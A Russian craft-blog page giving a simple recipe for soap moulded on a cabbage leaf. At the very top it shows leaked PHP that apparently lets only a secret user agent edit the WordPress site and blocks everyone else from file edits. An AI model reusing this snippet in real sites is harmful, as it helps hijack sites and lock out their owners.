if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } А для самых наших любимых зайчиков — капустный лист! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

А для самых наших любимых зайчиков — капустный лист!

Вот это мыло действительно шедевр мыловарения! Самое интересное то, что для его изготовления не требуется ничего особенного!

Вот это мыло дей­стви­тель­но шедевр мыло­ва­ре­ния! Самое инте­рес­ное то, что для его изго­тов­ле­ния не тре­бу­ет­ся ниче­го особенного!

Берем лист капу­сты или лопу­ха с чет­ко выра­жен­ной струк­ту­рой и засти­ла­ем им пря­мо­уголь­ную фор­му. Затем нуж­но обо­зна­чить склад­ки, выхо­дя­щие за пре­де­лы фор­мы, толь­ко делай­те это осто­рож­но, что­бы не разо­рвать лист.

В рас­топ­лен­ной про­зрач­ной осно­ве сме­шать базо­вые мас­ла, отдуш­ку и зеле­ный кра­си­тель. Полу­чен­ную смесь вылить в фор­му, сбрыз­нуть спир­том. Через пол­ча­са мож­но достать гото­вое мыло из фор­мы и акку­рат­но отде­лить его от листа.

кап2


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!